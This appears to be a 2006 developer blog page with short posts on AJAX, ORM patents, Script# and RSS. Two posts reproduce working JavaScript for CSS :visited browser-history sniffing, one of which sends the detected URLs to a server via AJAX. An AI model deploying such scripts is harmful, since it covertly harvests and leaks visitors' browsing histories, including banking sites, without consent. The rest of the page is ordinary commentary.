Jesse Ezell Blog

Stealing History (Part 2)

Cody Swann has a modified version of the exploit using prototype that works in IE and has support for AJAX requests:

<html>
<head>
<script type="text/javascript" src="http://script.aculo.us/prototype.js"></script>
</head>
<body>
Have you been to these sites?
<script type="text/javascript">

Snoop = Class.create();

Snoop.prototype = {
	initialize: function(options)
	{
		this.options = Object.extend({
			writeStyle: true,
			linkObjArray: null, //AN ARRAY OF JSON FORMATTED LINK OBJ IN THE FORM OF {link:'http://...',text:'nameOfSite'} THAT WILL BE CHECKED
			identifier: '', //IF SAVING THE DATA, THIS IS WHAT YOU WOULD LIKE TO USE TO IDENFIFY THE SESSON
			saveURL: null, //URL TO SEND THE DATA TO
			method: 'get', //METHOD USED IN AJAX SAVE
			transport: null, //TRANSPORT USED TO SEND SAVED DATA (XMLHTTPRequest by default)
			onComplete: function(visitedLinks)///FUNCTION CALLED AFTER PARSING LINKS
			{
				var dummy = document.createElement('ul');
				visitedLinks.each(
					function(linkObj)
					{
						var text = document.createTextNode(linkObj.text);
						var node = document.createElement('a');
						var li = document.createElement('li');
						node.appendChild(text);
						node.setAttribute('href',linkObj.link);
						li.appendChild(node);
						dummy.appendChild(li);
					}
				);
				document.body.appendChild(dummy);
			},
			onSaveComplete: function(){},///CALLBACK FOR AJAX FUNCTION ON SUCCESS
			onSaveError: function(){}///CALLBACK FOR AJAX FUNCTION ON FAILURE
		}, options || {});
		this._visitedLinks = [];
		if(this.options.writeStyle)
		{
			document.write('<style type="text/css">a.testerLink:visited{display:block;height:1px;}</style>');
		}
		this.collectVisitedLinks();
		this.finish();
	},
	collectVisitedLinks: function()
	{
		var dummy = document.createElement('div');
		dummy.id = 'visitTestDiv';
		Element.setStyle(dummy,{visibility:'hidden',height:'1px',lineHeight:'1px'});
		document.body.appendChild(dummy);
		var linkObjs = this.options.linkObjArray || [{link:'http://new.com/',text:'new'},{link:'http://new.2com/',text:'new2'},{link:'http://google.com/',text:'Google.com'},{link:'http://espn.go.com/',text:'ESPN.com'},{link:'http://script.aculo.us/',text:'Scriptaculous'},{link:'http://digg.com/',text:'Digg'},{link:'http://blog.slimc.com/',text:'Slimc.com'},{link:'http://www.cnn.com/',text:'CNN.com'},{link:'http://www.yahoo.com/',text:'Yahoo!'},{link:'http://myspace.com',text:'MySpace'},{link:'http://www.ebay.com/',text:'ebay'},{link:'http://wikipedia.org/',text:'Wikipedia'},{link:'http://amazon.com/',text:'Amazon.com'},{link:'http://sfbay.craigslist.org/',text:"Craig's List"}];
		linkObjs.each(
			function(linkObj,count)
			{
				var text = document.createTextNode(linkObj.text);
				var node = document.createElement('a');

				node.setAttribute('href',linkObj.link);
				Element.addClassName(node,'testerLink');
				dummy.appendChild(node);
				if(parseInt(Element.getHeight(node)) != 0)
				{
					this._visitedLinks.push(linkObj);
				}
				Element.remove(node);
			}.bind(this)
		);
		Element.remove(dummy);
	},
	finish: function()
	{
		if(this.options.saveURL)
		{
			var urls = this._visitedLinks.collect(function(link){ return link.link; });
			urls = urls.join(',');
			urls = escape(urls.replace(/,$/,''));
			urls = urls.replace(/%2C/,',');
			new Ajax.Request(this.options.saveURL,{
				transport: this.options.transport,
				method: this.options.method,
				parameters: 'id=' + this.options.identifier + '&urls=' + urls,
				onSuccess: this.options.onSaveComplete,
				onFailure: this.options.onSaveError
			});
		}
		this.options.onComplete(this._visitedLinks);
	}
};
new Snoop({saveURL:'/right/here'});
</script>
</body>
</html>

[1] http://blog.slimc.com/prototype-javascript-ending-privacy-one-visit-at-a-time/

Replacing the CPU with the GPU

I've been keeping an eye on this type of thing ever since I read a paper about using the GPU for generic tasks. We are beginning to see GPU's enter a new area, where they function like math coprocessors of the old days. This is going to be great for the bioninformatics industry.

[1] http://channel9.msdn.com/showpost.aspx?postid=229585

Stealing History

Update: Cody Swan has a version that works in IE and supports AJAX to log the urls somewhere. Info here. 

 Jeremiah Grossman has demonstrated an interesting way to sniff out browser history via CSS hacks. IE7 RC1 is smart enough to block the site, but FireFox lists my history without any complaints. Spooky. The script it embedded on the page, and it appears that basic technique involves setting the visited link color via CSS on a group of links to common sites, and then getting the computed values of the links and seeing which ones have the visited color. Very clever way to hijack someone's history:

<script>
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
	"http://login.yahoo.com/",
	"http://www.jailbabes.com",
	"http://ha.ckers.org",
	"http://seoblackhat.com",
	"http://www.cgisecurity.com",
	"http://www.spidynamics.com",
	"http://www.cenzic.com",
	"http://www.watchfire.com",
	"http://www.ntobjectives.com",
	"http://www.webappsec.org",
	"http://www.whitehatsec.com",
	"http://english.aljazeera.net/HomePage",
	"http://mail.google.com/",
	"http://mail.yahoo.com/",
	"http://my.yahoo.com/",
	"http://slashdot.org/",
	"http://www.myspace.com/",
	"http://www.amazon.com/",
	"http://www.aol.com/",
	"http://www.bankofamerica.com/",
	"http://www.bankone.com/",
	"http://www.blackhat.com/",
	"http://www.blogger.com/",
	"http://www.bofa.com/",
	"http://www.capitalone.com/",
	"http://www.chase.com/",
	"http://www.citibank.com/",
	"http://www.cnn.com/",
	"http://www.comerica.com/",
	"http://www.e-gold.com/",
	"http://www.ebay.com/",
	"http://www.etrade.com/",
	"http://www.google.com/",
	"http://www.hsbc.com/",
	"http://www.icq.com/",
	"http://www.microsoft.com/",
	"http://www.msn.com/",
	"http://www.myspace.com/",
	"http://www.passport.net/",
	"http://www.paypal.com/",
	"http://www.sourceforge.net/",
	"http://www.statefarm.com/",
	"http://www.usbank.com/",
	"http://www.wachovia.com/",
	"http://www.wamu.com/",
	"http://www.wellsfargo.com/",
	"http://www.xanga.com/",
	"http://www.yahoo.com/",
	"https://commerce.blackhat.com/",
	"https:/banking.wellsfargo.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {
	
	var d = document.createElement('div');
	d.id = 'xss_flag';
	document.body.appendChild(d);

	var d = document.createElement('table');
	d.border = 0;
	d.cellpadding = 5;
	d.cellspacing = 10;
	d.width = '90%';
	d.align = 'center';
	d.id = 'data';
	document.body.appendChild(d);
	
	document.write('<style>');
	for (var i = 0; i < websites.length; i++) {
		document.write('#id' + i + ":visited {color: #0000FF;}");
	}
	document.write('</style>');

	/* launch steal history */

if (is_mozilla) {
stealHistory();	
}
	
}


/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browsers history to an off-domain URL.			#
-----------------------------------------------------------------------*/
function stealHistory() {
	
	// loop through websites and check which ones have been visited
	for (var i = 0; i < websites.length; i++) {
	
		var link = document.createElement("a");
		link.id = "id" + i;
		link.href = websites[i];
		link.innerHTML = websites[i];
		
		document.body.appendChild(link);
		var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
		document.body.removeChild(link);

		// check for visited
		if (color == "rgb(0, 0, 255)") {
			document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>');
		} // end visited check
		
	} // end visited website loop
	
} // end stealHistory method

</script>

[1] http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

Simple AJAX Steps for Success

We are doing a ton of AJAX work with Articulate Online. Here are 10 helpful hints if you are considering using AJAX in an upcoming project:

1. You don't need an AJAX library 
2. Download Aptana. Make it your default .js editor inside Visual Studio.
3. Place all Javascript in external files (like codebehind)
4. Instead of making invoking requests directly from your pages, build a class library that does the dirty work.
   hint: once you have these base libraries, add the files the code assist window to get auto-complete inside Aptana. Aptana lets you add documentation comments as well as parameter and return type information. Use it!
5. You don't need an AJAX library.
6. You can make classes in Javascript too.
7. You don't have to define seperate functions for async callbacks from webservices. Use anonymous methods to inline your code in the calling method.
8. Consider providing ways to extend standard HTML elements rather that trying to make up all sorts of funky controls. Controls have a place, but consider the common example of a grid. A grid is really just a table. Don't create a grid class, provide a way extend the table and add column sorts, row hover handling, row selection, etc. to it. Then, you can use standard HTML layouts and design and simply call a function or two to inject the features you want.
9. Make sure to secure your AJAX server side.
10. You don't need an AJAX library.

Why do I point out over and over that you don't need an AJAX library? Because all the AJAX hype out there makes the problems out to be a lot more difficult than they are. I would recommend one little script to abstract away SOAP or JSON requests, since you probably don't want to build that manually, but you don't really need much else to get started building AJAX into your applications. The most important thing to do is get a solid understanding of Javascript and CSS and make sure that you use standard DOM properties as much as possible. A great editor like Aptana can also be an extremely valuable tool. This isn't to say that using an AJAX library is a bad thing, just that you can get by fine without one if you would rather not add the extra dependancies and complexity to your app. The browser differences are not nearly as bad as the mobs might have you believe.

Also keep in mind that you don't have to make every element clickable and every node draggable. Web apps are not windows apps. You don't need one base page that everything is dynamically added to and removed from. On the contrary, it is nice to have back and forward buttons that actually do something. A lot of improvement can be made by simply adding a few AJAX callbacks to eliminate those annoying pages you used to have to make with 2 lines of text and a button.

Google = Evil

Marc does an excellent job of laying out Google's evil strategy:

[1] http://blog.broadbandmechanics.com/2006/08/better-mousetrap-or-a-new-form-of-lock-in

Dare on AJAX / RSS

Great post by Dare 

...This reminds me of a conversation I was having with Eric Fleischman about blogging and RSS becoming mainstream yesterday. We agreed that blogging is already mainstream because everyone has a MySpace from politicians and school teachers to movie stars and DJs. On the other hand, I didn't think subscribing to feeds in a conventional aggregator would ever become used by a widespread percentage of the population. Subscribing to feeds seems cool to geeks because it solves a geek problem; having too many sources of information to keep track of and optimizing how this is done. The average person doesn't think it's cool to be able to keep track of 10 - 20 websites a day using a some tool because they aren't interested in 10 - 20 websites on a daily basis in the first place. I'm sure a light sprinkling of AJAX can solve that problem as well.

*sprinkle* *sprinkle* *sprinkle*  [1]

[1] http://www.25hoursaday.com/weblog/PermaLink.aspx?guid=fe3c99ee-4430-4238-8975-93c38740d8b4

IContext = Good

Andrew Stopford asks: 

One of the comments in Phil's post on using the MVP patten is mapping the Context object to a type that is based on a IContext pattern. For an example of what this does take a look at the interface here and its creation here (CreateContext method). It feels wrong me to though as your adding the request and response data to a collection and getting at the data that way and it seems to go from one object layout to another. I guess that for unit test purposes (mocking the data that this contains for example) this would be useful, am I right in my thinking here. [1]

I can say confidently that context objects are definately a good thing. Now, that isn't to say that every app needs them, but most complex apps can benefit from them. Testing your classes inside something like NUnit is only one part of the story. There are other instances where you might want to take part of the app outside of the web. For instance, while working on Articulate Online (very sweet LMSish product we are about to knock the socks off the entire e-Learning industry with), we decided we wanted to run reports in an external service rather than tying up the web processes. All of the sudden we were faced with having to be able to make calls into any of our classes (which make use of context to access things stored in places like session or query strings while on the web). Had we not made sure to create a context object to handle accessing this stuff (lessons learned from building a CMS product ealier), we would have been forced to go through our code and weed out all the Session["..."], Request["..."], and HttpContext references. Fortunately, planning ahead made running our code outside the web a seamless process.

[1] http://weblogs.asp.net/astopford/archive/2006/08/23/IContext_2C00_-good-or-bad.aspx

xFruits: Consume your RSS

xFruits is a slick service that lets you transform RSS/OPML/etc. in all sorts of neat ways (Mobile, Web, PDF). Here is a sample, my feed turned into a mobile site

Check it out. Very cool idea.

[1] http://www.xfruits.com

ORM + You = Lawsuit

"FireStar recently filed a lawsuit (also in East Texas) against Red Hat for the use of the principle of Object Relational Mapping in Hibernate (developed by JBoss), a popular component of Java applications. Jim Farmer of immagic has confirmed that Sakai uses Hibernate and is, therefore, vulnerable to both direct and indirect infringement charges by FireStar. Farmer has also confirmed that while uPortal 2 does not use Hibernate, plans are underway to incorporate the component in uPortal 3. FireStar's patent claim goes beyond Hibernate, which is only one implementation among many of the Object Relational paradigm. Potentially any web framework that uses ORM, including those deployed in PHP, Ruby on Rails, or .NET, is vulnerable."

[1] http://tatler.typepad.com/nose/2006/08/the_patent_cris.html

C#->Javascript Compiler

You had to know it was only a matter of time. Google has their Java->Javascript compiler and the Xamlon guys have their C#->ActionScript compiler. Soon, we will have a C#->Javascript compiler thanks to Nikhil Kothari (Script#):

http://projects.nikhilk.net/Projects/ScriptSharp.aspx